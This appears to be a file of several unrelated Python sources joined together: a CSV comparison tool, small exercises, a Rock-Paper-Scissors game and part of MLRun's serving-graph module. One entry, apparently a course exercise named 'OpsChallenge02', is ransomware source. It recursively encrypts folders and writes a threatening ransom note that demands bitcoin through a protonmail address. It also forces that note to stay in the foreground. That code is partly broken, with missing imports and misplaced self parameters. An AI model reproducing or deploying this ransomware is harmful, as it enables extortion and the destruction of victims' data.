      ubsr_only.csv       - key combination present only in file2 (UBSR)

    df1 = Vision, df2 = UBSR; df3/df4 are their key-matched subsets. "crc" is
    the comma-joined key columns used as the match fingerprint; "all_keys" /
    "non_key" are analogous fingerprints over other column sets.

    NOTE(review): this module targets Python 2 (see the `print` statement in
    main). Under Python 3 `map(int, keys)` below is a one-shot iterator and
    the repeated `df1[keys]` / `df2[keys]` lookups would break — wrap it in
    list() if porting. The timestamp column must parse as %Y-%m-%d-%H.%M.%S.
    '''
    df1 = pd.read_csv(file1,header=None,sep=',|\|',engine='python')
    df2 = pd.read_csv(file2,header=None,sep=',|\|',engine='python')
    keys = map(int, keys)
    # Compare everything as strings so joins/fingerprints are uniform.
    df1=df1.applymap(str)
    df2=df2.applymap(str)
    df1['crc'] = df1[keys].apply(','.join, axis=1)
    df2['crc'] = df2[keys].apply(','.join, axis=1)
    df2.set_index('crc', inplace = True)
    # Output file paths.
    perfectly_matched_file = os.path.join(op_folder,'perfect_matched.csv')
    partially_matched_file = os.path.join(op_folder,'partial_matched.csv')
    ubsr_updated = os.path.join(op_folder,'ubsr_updated.csv')
    vision_only_file = os.path.join(op_folder,'vision_only.csv')
    ubsr_only_file = os.path.join(op_folder,'ubsr_only.csv')
    # Key-matched subsets of each side (keys present in the other file).
    df3 = df1.loc[df1.crc.isin(df2.index)].drop('crc', axis=1)#partial vision data including timestamp from vision
    df2.reset_index(drop=True, inplace=True)
    df1.set_index('crc', inplace = True)
    df2['crc'] = df2[keys].apply(','.join, axis=1)
    df4 = df2.loc[df2.crc.isin(df1.index)].drop('crc', axis=1) #partial ubsr data including timestamp from ubsr
    df2.set_index('crc', inplace = True)
    df1.reset_index(drop=True, inplace=True)
    df1['crc'] = df1[keys].apply(','.join, axis=1)
    # Vision rows whose keys never appear in UBSR.
    df1.loc[~df1.crc.isin(df2.index)].drop('crc', axis=1).to_csv(vision_only_file, index=False, header = False)
    #Changing string timestamp into datetime object
    df3.iloc[:,timestamp_col_index] = pd.to_datetime(df3.iloc[:,timestamp_col_index],format='%Y-%m-%d-%H.%M.%S')
    df4.iloc[:,timestamp_col_index] = pd.to_datetime(df4.iloc[:,timestamp_col_index],format='%Y-%m-%d-%H.%M.%S')
    # Stack both sides; rows identical on all comparable columns (appearing
    # twice) are removed entirely by keep=False, leaving only changed rows.
    df5 = pd.concat([df3,df4]).sort_values(timestamp_col_index,ascending=False)
    df5.reset_index(drop=True, inplace=True)
    df5.drop_duplicates(all_keys,keep=False,inplace=True)
    #df6 will have latest timestamp file of partially matched file
    df6=df5.sort_values([timestamp_col_index],ascending=False).drop_duplicates(keys,keep='first')
    # Attribute each newest-changed row back to its side of origin.
    df1['all_keys'] = df1[all_keys].apply(','.join, axis=1)
    df1.set_index('all_keys', inplace = True)
    df6['all_keys']=df6[all_keys].apply(','.join, axis=1)
    df6.loc[df6.all_keys.isin(df1.index)].drop('all_keys',axis=1).to_csv(partially_matched_file, index=False, header = False)
    df2['all_keys'] = df2[all_keys].apply(','.join, axis=1)
    df2.set_index('all_keys', inplace = True)
    df6.loc[df6.all_keys.isin(df2.index)].drop('all_keys',axis=1).to_csv(ubsr_updated, index=False, header = False)
    df2['crc'] = df2[keys].apply(','.join, axis=1)
    df2.set_index('crc', inplace = True)
    # Perfect matches: key-matched Vision rows whose non-key fingerprint also
    # appears among the key-matched UBSR rows.
    df3['non_key'] = df3[non_keys].apply(','.join, axis=1)
    df2.rename_axis(None)  # NOTE(review): no-op — rename_axis returns a copy unless assigned/inplace
    df2['non_key'] = df2[non_keys].apply(','.join, axis=1)
    df2.set_index('non_key', inplace=True)
    df4['non_key']=df4[non_keys].apply(','.join, axis=1)
    df4.set_index('non_key', inplace = True)
    df3.loc[df3.non_key.isin(df4.index)].drop('non_key', axis=1).to_csv(perfectly_matched_file, index=False, header = False)
    #####df3.loc[~df3.non_key.isin(df2.index)].drop('non_key', axis=1).to_csv(partially_matched_file, index=False, header = False)
    # UBSR rows whose keys never appear in Vision.
    df2['crc'] = df2[keys].apply(','.join, axis=1)
    df2.reset_index(drop=True, inplace=True)
    df1.set_index('crc',inplace =True)
    df2.loc[~df2.crc.isin(df1.index)].drop('crc', axis=1).to_csv(ubsr_only_file, index=False, header=False)
def main(arguments):
    """CLI entry point: parse arguments, derive the key/non-key column split
    for the first file, run the comparison, and print the elapsed seconds."""
    start_time = time.time()
    parser = argparse.ArgumentParser()
    parser.add_argument('-k', action='store', dest='keys_file', help='Path of keys file', required=True)
    parser.add_argument('-f', action='store', dest='first_csv', help='Path of first csv file', required=True)
    parser.add_argument('-s', action='store', dest='second_csv', help='Path of second csv file', required=True)
    parser.add_argument('-o', action='store', dest='op_folder', help='Path of output folder', required=True)
    args = parser.parse_args(arguments)
    key_rules = read_key_rules(args.keys_file)
    keys = get_keys(args.first_csv, key_rules)
    if not keys:
        # Validate BEFORE calling get_non_keys: the original called it first
        # and crashed on keys=None. Also, `raise "..."` (a string) is illegal —
        # raising requires an exception class/instance.
        raise ValueError("File format not correct")
    (non_keys, timestamp_col_index, all_keys) = get_non_keys(args.first_csv, keys)
    compare_csv(args.first_csv, args.second_csv, keys, non_keys, timestamp_col_index, all_keys, args.op_folder)
    end_time = time.time()
    print(end_time - start_time)


if __name__ == '__main__':
    main(sys.argv[1:])
22,013 | 6700dea03b5e738227d28994e500ca9bfbb24e24 | #Exercise Question 4: Given a list iterate it and count the occurrence of each element and create a dictionary to show the count of each element
#Original list [11, 45, 8, 11, 23, 45, 23, 45, 89]
#Printing count of each item {11: 2, 45: 3, 8: 1, 23: 2, 89: 1}
import sys
origList= [11, 45, 8, 11, 23, 45, 23, 45, 89]
# Build the element -> occurrence-count mapping in a single pass. The
# original called list.count() inside the loop, which is O(n^2); the
# resulting dict (and its insertion order) is identical.
countDict=dict()
for i in origList:
    countDict[i] = countDict.get(i, 0) + 1
print(countDict)
|
22,014 | 0f452502b2f623a2c14744c7464941876d6816a7 | #!/usr/bin/env python3
###########################
# Title: OpsChallenge02
# Author:Jeff Snyder
# Date: 18OCT2020
# Purpose:Encrypt/Decrypt a Folder Recursively added ransomware notes
###########################
import os
from cryptography.fernet import Fernet
import smtplib
import ctypes
import win32gui
import urllib.request
import subprocess
import threading
def generate_key():
"""
Generates a key and save it into a file
"""
key = Fernet.generate_key()
with open("secret.key", "wb") as key_file:
key_file.write(key)
def load_key():
"""
Load the previously generated key
"""
return open("secret.key", "rb").read()
def folderEncrypt(fileLocation):
path = fileLocation
files = []
# r=root, d=directories, f = files
for r, d, f in os.walk(path):
for file in f:
files.append(os.path.join(r, file))
for f in files:
print(f)
encrypt(f)
def folderDecrypt(fileLocation):
path = fileLocation
files = []
# r=root, d=directories, f = files
for r, d, f in os.walk(path):
for file in f:
files.append(os.path.join(r, file))
for f in files:
print(f)
decrypt(f)
def encrypt(fileLocation):
key = load_key()
"""
Given a fileLocation (str) and key (bytes), it encrypts the file and write it
"""
f = Fernet(key)
with open(fileLocation, "rb") as file:
# read all file data
file_data = file.read()
# encrypt data
encrypted_data = f.encrypt(file_data)
# write the encrypted file
with open(fileLocation, "wb") as file:
file.write(encrypted_data)
def decrypt(fileLocation):
"""
Given a fileLocation (str) and key (bytes), it decrypts the file and write it
"""
key = load_key()
f = Fernet(key)
with open(fileLocation, "rb") as file:
# read the encrypted data
encrypted_data = file.read()
# decrypt data
decrypted_data = f.decrypt(encrypted_data)
# write the original file
with open(fileLocation, "wb") as file:
file.write(decrypted_data)
def ransomware():
def ransom_note(self):
date = datetime.date.today().strftime('%d-%B-Y')
with open('RANSOM_NOTE.txt', 'w') as f:
f.write(f'''
The harddisks of your computer have been encrypted with an Military grade encryption algorithm.
There is no way to restore your data without a special key.
Only we can decrypt your files!
To purchase your key and restore your data, please follow these three easy steps:
1. Email the file called EMAIL_ME.txt at {self.sysRoot}Desktop/EMAIL_ME.txt to GetYourFilesBack@protonmail.com
2. You will recieve your personal BTC address for payment.
Once payment has been completed, send another email to GetYourFilesBack@protonmail.com stating "PAID".
We will check to see if payment has been paid.
3. You will receive a text file with your KEY that will unlock all your files.
IMPORTANT: To decrypt your files, place text file on desktop and wait. Shortly after it will begin to decrypt all files.
WARNING:
Do NOT attempt to decrypt your files with any software as it is obselete and will not work, and may cost you more to unlcok your files.
Do NOT change file names, mess with the files, or run deccryption software as it will cost you more to unlock your files-
-and there is a high chance you will lose your files forever.
Do NOT send "PAID" button without paying, price WILL go up for disobedience.
Do NOT think that we wont delete your files altogether and throw away the key if you refuse to pay. WE WILL.
''')
def show_ransom_note(self):
# Open the ransom note
ransom = subprocess.Popen(['notepad.exe', 'RANSOM_NOTE.txt'])
count = 0 # Debugging/Testing
while True:
time.sleep(0.1)
top_window = win32gui.GetWindowText(win32gui.GetForegroundWindow())
if top_window == 'RANSOM_NOTE - Notepad':
print('Ransom note is the top window - do nothing') # Debugging/Testing
pass
else:
print('Ransom note is not the top window - kill/create process again') # Debugging/Testing
# Kill ransom note so we can open it agian and make sure ransom note is in ForeGround (top of all windows)
time.sleep(0.1)
ransom.kill()
# Open the ransom note
time.sleep(0.1)
ransom = subprocess.Popen(['notepad.exe', 'RANSOM_NOTE.txt'])
# sleep for 10 seconds
time.sleep(10)
count +=1
if count == 5:
break
# Decrypts system when text file with un-encrypted key in it is placed on dekstop of target machine
# def put_me_on_desktop(self):
# # Loop to check file and if file it will read key and then self.key + self.cryptor will be valid for decrypting-
# # -the files
# print('started') # Debugging/Testing
# while True:
# try:
# print('trying') # Debugging/Testing
# # The ATTACKER decrypts the fernet symmetric key on their machine and then puts the un-encrypted fernet-
# # -key in this file and sends it in a email to victim. They then put this on the desktop and it will be-
# # -used to un-encrypt the system. AT NO POINT DO WE GIVE THEM THE PRIVATE ASSYEMTRIC KEY etc.
# with open(f'{self.sysRoot}/Desktop/PUT_ME_ON_DESKTOP.txt', 'r') as f:
# self.key = f.read()
# self.crypter = Fernet(self.key)
# # Decrpyt system once have file is found and we have cryptor with the correct key
# self.crypt_system(encrypted=True)
# print('decrypted') # Debugging/Testing
# break
# except Exception as e:
# print(e) # Debugging/Testing
# pass
# time.sleep(10) # Debugging/Testing check for file on desktop ever 10 seconds
# print('Checking for PUT_ME_ON_DESKTOP.txt') # Debugging/Testing
# # Would use below code in real life etc... above 10secs is just to "show" concept
# # Sleep ~ 3 mins
# # secs = 60
# # mins = 3
# # time.sleep((mins*secs))
def main():
print("1. Encrypt a folder \n2. Decrypt a folder")
mode=input("Which mode would you like to run? Choose 1-3: ")
print("mode is:", mode)
if mode== "1":
generate_key()
print("You have chosen 1")
fileLocation=input("You have chosen mode 1. \nPlease type the location of the folder you would like to encrypt: ")
folderEncrypt(fileLocation)
elif mode== "2":
print("You have chosen mode 2")
fileLocation=input("You have chosen mode 2. \nPlease type the location of the folder you would like to decrypt: ")
folderDecrypt(fileLocation)
elif mode== "3":
print("You have chosen mode 3 which is a simulation. Use mode 2 to unencrypt")
fileLocation=input("Enter the file location.")
folderEncrypt(fileLocation)
ransomware()
main()
# with help from "https://github.com/ncorbuk/Python-Ransomware/blob/master/RansomWare.py"
# help from https://devqa.io/encrypt-decrypt-data-python/
# help from https://www.thepythoncode.com/article/encrypt-decrypt-files-symmetric-python |
22,015 | d3435b91000d938971c0c781b5257aa62ef10870 | name = 'Euzebiusz'
a, b = 1,2 # unpacking assignment from a tuple
c, d = [1,2] # unpacking assignment from a list
a,b,c,d = [1,2,3,4]
first, *other = [1, 2, 3, 4] # extended sequence unpacking (Python 3)
print(first, other)
first,*other,last = [1,2,3,4]
print(first, other, last)
a += 42 # augmented assignment
|
22,016 | 9c6c2723f09e50739430f0885d478412875dec94 | credential_path = "My First Project-a1358813ada7.json" |
22,017 | 9e30d6ee97bc16996463b268b374c28c976a5270 | from human import Human
from ai import Ai
class Game:
    def __init__(self):
        """Set up the players: player one is always human, player two is
        chosen later in game_type() (Human for multiplayer, Ai for single)."""
        self.player_one = Human()
        self.player_two = None
    def run_game(self):
        """Run one full game: greeting, rules, mode selection, rounds, winner."""
        self.welcome_message()
        self.display_rules()
        self.game_type()
        self.game_rounds()
        self.get_game_winner()
    def welcome_message(self):
        """Print the game's greeting banner."""
        print('Welcome to Rock, Paper, Scissors, Lizard, Spock game!')
    def display_rules(self):
        """Print the full list of which gesture defeats which."""
        print('\nEach player choses one gesture from the list\n Rock crushes Scissors\n Scissors cuts Paper\n Paper covers Rock\n Rock crushes Lizard\n Lizard poisons Spock\n Spock smashes Scissors\n Scissors decapitates Lizard\n Lizard eats Paper\n Paper disproves Spock\n Spock vaporizes Rock')
def game_type(self):
validation = False
while validation is False:
user_choice = int(input('\nPlay a single player game or two player game? type "1" for single and "2" for multi: '))
if user_choice == 1 or user_choice == 2:
validation = True
else:
print('Please choose either "1" or "2"')
if user_choice == 1:
self.player_two = Ai()
else:
self.player_two = Human()
def game_rounds(self):
while self.player_one.score < 2 and self.player_two.score < 2:
p1_gesture = self.player_one.choose_gesture()
p2_gesture = self.player_two.choose_gesture()
print(f'{self.player_one.name} chose {p1_gesture}.')
print(f'{self.player_two.name} chose {p2_gesture}.')
self.choose_round_winner(p1_gesture, p2_gesture)
def choose_round_winner(self, p1_gesture, p2_gesture):
if p1_gesture == "Rock":
if(p2_gesture == "Rock"):
print("tie")
elif(p2_gesture == "Paper" or p2_gesture == "Spock"):
self.player_two.set_score()
print(self.player_two.name + " wins round")
elif(p2_gesture == "Scissors" or p2_gesture == "Lizard"):
self.player_one.set_score()
print(self.player_one.name + " wins round")
elif p1_gesture == "Paper":
if(p2_gesture == "Rock" or p2_gesture == "Spock"):
self.player_one.set_score()
print(self.player_one.name + " wins round")
elif(p2_gesture == "Paper"):
print("tie")
elif(p2_gesture == "Scissors" or p2_gesture == "Lizard"):
self.player_two.set_score()
print(self.player_two.name + " wins round")
elif p1_gesture == "Scissors":
if(p2_gesture == "Paper" or p2_gesture == "Lizard"):
self.player_one.set_score
print(self.player_one.name + " wins round")
elif(p2_gesture == "Rock" or p2_gesture == "Spock"):
self.player_two.set_score()
print(self.player_two.name +" wins")
elif(p2_gesture == "Scissors"):
print("tie")
elif p1_gesture == "Lizard":
if(p2_gesture == "Rock" or p2_gesture == "Scissors"):
self.player_two.set_score()
print(self.player_two.name +" wins round")
elif(p2_gesture == "Paper" or p2_gesture == "Spock"):
self.player_one.set_score()
print(self.player_one.name + " wins round")
elif(p2_gesture == "Lizard"):
print("tie")
elif p1_gesture == "Spock":
if(p2_gesture == "Rock" or p2_gesture == "Scissors"):
self.player_one.set_score()
print(self.player_one.name + " wins round")
elif(p2_gesture == "Paper" or p2_gesture == "Lizard"):
self.player_two.set_score()
print(self.player_two.name + " wins round")
elif(p2_gesture == "Spock"):
print("tie")
def get_game_winner(self):
if(self.player_one.score == 2):
print(self.player_one.name + " Wins!")
else:
print(self.player_two.name + " Wins!") |
22,018 | d77aad8ee4f02c4f57f9248ced41e6b44a2a7de2 | # Copyright 2018 Iguazio
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__all__ = ["TaskStep", "RouterStep", "RootFlowStep"]
import os
import pathlib
import traceback
import warnings
from copy import copy, deepcopy
from inspect import getfullargspec, signature
from typing import Union
from ..config import config
from ..datastore import get_stream_pusher
from ..errors import MLRunInvalidArgumentError
from ..model import ModelObj, ObjectDict
from ..platforms.iguazio import parse_v3io_path
from ..utils import get_class, get_function
from .utils import _extract_input_data, _update_result_body
callable_prefix = "_"
path_splitter = "/"
previous_step = "$prev"
class GraphError(Exception):
    """error in graph topology or configuration (raised while building/validating a graph)"""

    pass
class StepKinds:
    """string constants for the step "kind" field used in serialized graph specs"""

    router = "router"
    task = "task"
    flow = "flow"
    queue = "queue"
    choice = "choice"
    root = "root"
# field names serialized to/from dict for TaskStep (RouterStep adds "routes")
_task_step_fields = [
    "kind",
    "class_name",
    "class_args",
    "handler",
    "skip_context",
    "after",
    "function",
    "comment",
    "shape",
    "full_event",
    "on_error",
    "responder",
    "input_path",
    "result_path",
]
def new_model_endpoint(class_name, model_path, handler=None, **class_args):
    """Build a TaskStep that serves a model loaded from *model_path*.

    The extra keyword arguments are copied (so the caller's dict is not
    mutated) and passed to the step class together with ``model_path``.
    """
    args = {**deepcopy(class_args), "model_path": model_path}
    return TaskStep(class_name, args, handler=handler)
def new_remote_endpoint(url, **class_args):
    """Build a ``$remote`` TaskStep that forwards events to *url*.

    The keyword arguments are copied (the caller's dict is untouched) and
    passed to the remote step class together with ``url``.
    """
    args = {**deepcopy(class_args), "url": url}
    return TaskStep("$remote", args)
class BaseStep(ModelObj):
    """base class for all graph steps: holds name, topology links and error handling"""

    kind = "BaseStep"
    default_shape = "ellipse"
    # fields serialized to/from dict
    _dict_fields = ["kind", "comment", "after", "on_error"]

    def __init__(self, name: str = None, after: list = None, shape: str = None):
        self.name = name
        self._parent = None  # enclosing flow/router, set via set_parent()
        self.comment = None
        self.context = None
        self.after = after  # list of upstream step names
        self._next = None  # downstream step names, computed by the graph
        self.shape = shape
        self.on_error = None  # name of the error-handler step
        self._on_error_handler = None  # resolved run() of the error step

    def get_shape(self):
        """graphviz shape"""
        return self.shape or self.default_shape

    def set_parent(self, parent):
        """set/link the step parent (flow/router)"""
        self._parent = parent

    @property
    def next(self):
        # downstream step names (filled by check_and_process_graph)
        return self._next

    @property
    def parent(self):
        """step parent (flow/router)"""
        return self._parent

    def set_next(self, key: str):
        """set/insert the key as next after this step, optionally remove other keys"""
        if not self.next:
            self._next = [key]
        elif key not in self.next:
            self._next.append(key)
        return self

    def after_step(self, after):
        """specify the previous step name"""
        # most steps only accept one source
        self.after = [after] if after else []
        return self

    def after_state(self, after):
        """deprecated alias of after_step()"""
        warnings.warn(
            "This method is deprecated. Use after_step instead",
            # TODO: In 0.7.0 do changes in examples & demos In 0.9.0 remove
            PendingDeprecationWarning,
        )
        return self.after_step(after)

    def error_handler(self, step_name: str = None, state_name=None):
        """set error handler step (on failure/raise of this step)"""
        if state_name:
            warnings.warn(
                "The state_name parameter is deprecated. Use step_name instead",
                # TODO: In 0.7.0 do changes in examples & demos In 0.9.0 remove
                PendingDeprecationWarning,
            )
        step_name = step_name or state_name
        if not step_name:
            raise MLRunInvalidArgumentError("Must specify step_name")
        self.on_error = step_name
        return self

    def init_object(self, context, namespace, mode="sync", reset=False, **extra_kwargs):
        """init the step class"""
        self.context = context

    def _is_local_function(self, context):
        # base steps always run locally; TaskStep overrides this
        return True

    def get_children(self):
        """get child steps (for router/flow)"""
        return []

    def __iter__(self):
        yield from []

    @property
    def fullname(self):
        """full path/name (include parents)"""
        name = self.name or ""
        if self._parent and self._parent.fullname:
            name = path_splitter.join([self._parent.fullname, name])
        return name.replace(":", "_")  # replace for graphviz escaping

    def _post_init(self, mode="sync"):
        pass

    def _set_error_handler(self):
        """init/link the error handler for this step"""
        if self.on_error:
            error_step = self.context.root.path_to_step(self.on_error)
            self._on_error_handler = error_step.run

    def _log_error(self, event, err, **kwargs):
        """on failure log (for sync mode)"""
        self.context.logger.error(
            f"step {self.name} got error {err} when processing an event:\n {event.body}"
        )
        message = traceback.format_exc()
        self.context.logger.error(message)
        self.context.push_error(
            event, f"{err}\n{message}", source=self.fullname, **kwargs
        )

    def _call_error_handler(self, event, err, **kwargs):
        """call the error handler if exist"""
        # returns the handler's result when set, otherwise implicitly None
        if self._on_error_handler:
            event.error = str(err)
            event.origin_state = self.fullname
            return self._on_error_handler(event)

    def path_to_step(self, path: str):
        """return step object from step relative/fullname"""
        path = path or ""
        tree = path.split(path_splitter)
        next_level = self
        for step in tree:
            if step not in next_level:
                raise GraphError(
                    f"step {step} doesnt exist in the graph under {next_level.fullname}"
                )
            next_level = next_level[step]
        return next_level

    def path_to_state(self, path: str):
        """deprecated alias of path_to_step()"""
        warnings.warn(
            "This method is deprecated. Use path_to_step instead",
            # TODO: In 0.7.0 do changes in examples & demos In 0.9.0 remove
            PendingDeprecationWarning,
        )
        return self.path_to_step(path)

    def to(
        self,
        class_name: Union[str, type] = None,
        name: str = None,
        handler: str = None,
        graph_shape: str = None,
        function: str = None,
        full_event: bool = None,
        input_path: str = None,
        result_path: str = None,
        **class_args,
    ):
        """add a step right after this step and return the new step

        example, a 4 step pipeline ending with a stream:
        graph.to('URLDownloader')\
             .to('ToParagraphs')\
             .to(name='to_json', handler='json.dumps')\
             .to('>>', 'to_v3io', path=stream_path)\

        :param class_name:  class name or step object to build the step from
                            for router steps the class name should start with '*'
                            for queue/stream step the class should be '>>' or '$queue'
        :param name:        unique name (and path) for the child step, default is class name
        :param handler:     class/function handler to invoke on run/event
        :param graph_shape: graphviz shape name
        :param function:    function this step should run in
        :param full_event:  this step accepts the full event (not just body)
        :param input_path:  selects the key/path in the event to use as input to the step
                            this require that the event body will behave like a dict, example:
                            event: {"data": {"a": 5, "b": 7}}, input_path="data.b" means the step will
                            receive 7 as input
        :param result_path: selects the key/path in the event to write the results to
                            this require that the event body will behave like a dict, example:
                            event: {"x": 5} , result_path="y" means the output of the step will be written
                            to event["y"] resulting in {"x": 5, "y": <result>}
        :param class_args:  class init arguments
        """
        if hasattr(self, "steps"):
            # this step is itself a flow, add the child into it
            parent = self
        elif self._parent:
            parent = self._parent
        else:
            raise GraphError(
                f"step {self.name} parent is not set or its not part of a graph"
            )

        name, step = params_to_step(
            class_name,
            name,
            handler,
            graph_shape=graph_shape,
            function=function,
            full_event=full_event,
            input_path=input_path,
            result_path=result_path,
            class_args=class_args,
        )

        step = parent._steps.update(name, step)
        step.set_parent(parent)
        if not hasattr(self, "steps"):
            # check that its not the root, todo: in future may gave nested flows
            step.after_step(self.name)
        parent._last_added = step
        return step
class TaskStep(BaseStep):
    """task execution step, runs a class or handler"""

    kind = "task"
    _dict_fields = _task_step_fields
    _default_class = ""

    def __init__(
        self,
        class_name: Union[str, type] = None,
        class_args: dict = None,
        handler: str = None,
        name: str = None,
        after: list = None,
        full_event: bool = None,
        function: str = None,
        responder: bool = None,
        input_path: str = None,
        result_path: str = None,
    ):
        super().__init__(name, after)
        self.class_name = class_name
        self.class_args = class_args or {}
        self.handler = handler
        self.function = function  # name of the child function this step runs in
        self._handler = None  # resolved callable invoked by run()
        self._object = None  # instantiated step class
        self._async_object = None
        self.skip_context = None
        self.context = None
        self._class_object = None  # resolved class (before instantiation)
        self.responder = responder
        self.full_event = full_event
        self.input_path = input_path
        self.result_path = result_path
        self.on_error = None
        self._inject_context = False  # pass context= kwarg to a bare handler
        self._call_with_event = False  # handler takes the full event (do_event)

    def init_object(self, context, namespace, mode="sync", reset=False, **extra_kwargs):
        """resolve the handler/class, instantiate it, and wire error handling"""
        self.context = context
        self._async_object = None
        if not self._is_local_function(context):
            # skip init of non local functions
            return

        if self.handler and not self.class_name:
            # link to function
            if callable(self.handler):
                self._handler = self.handler
                self.handler = self.handler.__name__
            else:
                self._handler = get_function(self.handler, namespace)
            # inject context only when the handler signature declares it
            args = signature(self._handler).parameters
            if args and "context" in list(args.keys()):
                self._inject_context = True
            return

        if isinstance(self.class_name, type):
            self._class_object = self.class_name
            self.class_name = self.class_name.__name__

        if not self._class_object:
            if self.class_name == "$remote":

                from mlrun.serving.remote import RemoteStep

                self._class_object = RemoteStep
            else:
                self._class_object = get_class(
                    self.class_name or self._default_class, namespace
                )

        if not self._object or reset:
            # init the step class + args
            class_args = {}
            for key, arg in self.class_args.items():
                # keys prefixed with "_" hold function references to resolve
                if key.startswith(callable_prefix):
                    class_args[key[1:]] = get_function(arg, namespace)
                else:
                    class_args[key] = arg
            class_args.update(extra_kwargs)

            # add common args (name, context, ..) only if target class can accept them
            argspec = getfullargspec(self._class_object)
            for key in ["name", "context", "input_path", "result_path", "full_event"]:
                if argspec.varkw or key in argspec.args:
                    class_args[key] = getattr(self, key)

            try:
                self._object = self._class_object(**class_args)
            except TypeError as exc:
                raise TypeError(
                    f"failed to init step {self.name}, {exc}\n args={self.class_args}"
                )

            # determine the right class handler to use
            handler = self.handler
            if handler:
                if not hasattr(self._object, handler):
                    raise GraphError(
                        f"handler ({handler}) specified but doesnt exist in class {self.class_name}"
                    )
            else:
                if hasattr(self._object, "do_event"):
                    handler = "do_event"
                    self._call_with_event = True
                elif hasattr(self._object, "do"):
                    handler = "do"
            if handler:
                self._handler = getattr(self._object, handler, None)

        self._set_error_handler()
        if mode != "skip":
            self._post_init(mode)

    def _is_local_function(self, context):
        # detect if the class is local (and should be initialized)
        current_function = get_current_function(context)
        if current_function == "*":
            return True
        if not self.function and not current_function:
            return True
        if (
            self.function and self.function == "*"
        ) or self.function == current_function:
            return True
        return False

    @property
    def async_object(self):
        """return the sync or async (storey) class instance"""
        return self._async_object or self._object

    def clear_object(self):
        self._object = None

    def _post_init(self, mode="sync"):
        if self._object and hasattr(self._object, "post_init"):
            self._object.post_init(mode)

    def respond(self):
        """mark this step as the responder.

        step output will be returned as the flow result, no other step can follow
        """
        self.responder = True
        return self

    def run(self, event, *args, **kwargs):
        """run this step, in async flows the run is done through storey"""
        if not self._is_local_function(self.context):
            # todo invoke remote via REST call
            return event

        if self.context.verbose:
            self.context.logger.info(f"step {self.name} got event {event.body}")

        # inject context parameter if it is expected by the handler
        if self._inject_context:
            kwargs["context"] = self.context
        elif kwargs and "context" in kwargs:
            del kwargs["context"]

        try:
            if self.full_event or self._call_with_event:
                # handler consumes and returns the whole event object
                return self._handler(event, *args, **kwargs)

            if self._handler is None:
                raise MLRunInvalidArgumentError(
                    f"step {self.name} does not have a handler"
                )

            # body-level call: extract input sub-path, write result sub-path
            result = self._handler(
                _extract_input_data(self.input_path, event.body), *args, **kwargs
            )
            event.body = _update_result_body(self.result_path, event.body, result)
        except Exception as exc:
            self._log_error(event, exc)
            handled = self._call_error_handler(event, exc)
            if not handled:
                raise exc
            event.terminated = True
        return event
class RouterStep(TaskStep):
    """router step, implement routing logic for running child routes"""

    kind = "router"
    default_shape = "doubleoctagon"
    _dict_fields = _task_step_fields + ["routes"]
    _default_class = "mlrun.serving.ModelRouter"

    def __init__(
        self,
        class_name: Union[str, type] = None,
        class_args: dict = None,
        handler: str = None,
        routes: list = None,
        name: str = None,
        function: str = None,
        input_path: str = None,
        result_path: str = None,
    ):
        super().__init__(
            class_name,
            class_args,
            handler,
            name=name,
            function=function,
            input_path=input_path,
            result_path=result_path,
        )
        self._routes: ObjectDict = None
        self.routes = routes

    def get_children(self):
        """get child steps (routes)"""
        return self._routes.values()

    @property
    def routes(self):
        """child routes/steps, traffic is routed to routes based on router logic"""
        return self._routes

    @routes.setter
    def routes(self, routes: dict):
        # deserialize route dicts into step objects (default kind: task)
        self._routes = ObjectDict.from_dict(classes_map, routes, "task")

    def add_route(
        self,
        key,
        route=None,
        class_name=None,
        handler=None,
        function=None,
        **class_args,
    ):
        """add child route step or class to the router

        :param key:        unique name (and route path) for the child step
        :param route:      child step object (Task, ..)
        :param class_name: class name to build the route step from (when route is not provided)
        :param class_args: class init arguments
        :param handler:    class handler to invoke on run/event
        """
        if not route and not class_name:
            raise MLRunInvalidArgumentError("route or class_name must be specified")
        if not route:
            route = TaskStep(class_name, class_args, handler=handler)
        route.function = function or route.function

        route = self._routes.update(key, route)
        route.set_parent(self)
        return route

    def clear_children(self, routes: list):
        """clear child steps (routes)"""
        if not routes:
            routes = self._routes.keys()
        for key in routes:
            del self._routes[key]

    def init_object(self, context, namespace, mode="sync", reset=False, **extra_kwargs):
        """init the router class (in "skip" mode) and then all of its routes"""
        if not self._is_local_function(context):
            return

        self.class_args = self.class_args or {}
        super().init_object(
            context, namespace, "skip", reset=reset, routes=self._routes, **extra_kwargs
        )

        for route in self._routes.values():
            if self.function and not route.function:
                # if the router runs on a child function and the
                # model function is not specified use the router function
                route.function = self.function
            route.set_parent(self)
            route.init_object(context, namespace, mode, reset=reset)
        self._set_error_handler()
        self._post_init(mode)

    def __getitem__(self, name):
        return self._routes[name]

    def __setitem__(self, name, route):
        self.add_route(name, route)

    def __delitem__(self, key):
        del self._routes[key]

    def __iter__(self):
        yield from self._routes.keys()

    def plot(self, filename=None, format=None, source=None, **kw):
        """plot/save a graphviz plot"""
        return _generate_graphviz(
            self, _add_graphviz_router, filename, format, source=source, **kw
        )
class QueueStep(BaseStep):
    """queue step, implement an async queue or represent a stream"""

    kind = "queue"
    default_shape = "cds"
    _dict_fields = BaseStep._dict_fields + [
        "path",
        "shards",
        "retention_in_hours",
        "options",
    ]

    def __init__(
        self,
        name: str = None,
        path: str = None,
        after: list = None,
        shards: int = None,
        retention_in_hours: int = None,
        **options,
    ):
        super().__init__(name, after)
        self.path = path  # stream path; when empty the queue has no pusher
        self.shards = shards
        self.retention_in_hours = retention_in_hours
        self.options = options
        self._stream = None
        self._async_object = None

    def init_object(self, context, namespace, mode="sync", reset=False, **extra_kwargs):
        """create the stream pusher for the configured path"""
        self.context = context
        if self.path:
            self._stream = get_stream_pusher(
                self.path,
                shards=self.shards,
                retention_in_hours=self.retention_in_hours,
            )
        self._set_error_handler()

    @property
    def async_object(self):
        return self._async_object

    def after_step(self, after):
        # queue steps accept multiple sources
        # NOTE(review): when self.after is already set and `after` is falsy the
        # existing list is kept as-is (unlike BaseStep, which resets it)
        if self.after:
            if after:
                self.after.append(after)
        else:
            self.after = [after] if after else []
        return self

    def after_state(self, after):
        """deprecated alias of after_step()"""
        warnings.warn(
            "This method is deprecated. Use after_step instead",
            # TODO: In 0.7.0 do changes in examples & demos In 0.9.0 remove
            PendingDeprecationWarning,
        )
        return self.after_step(after)

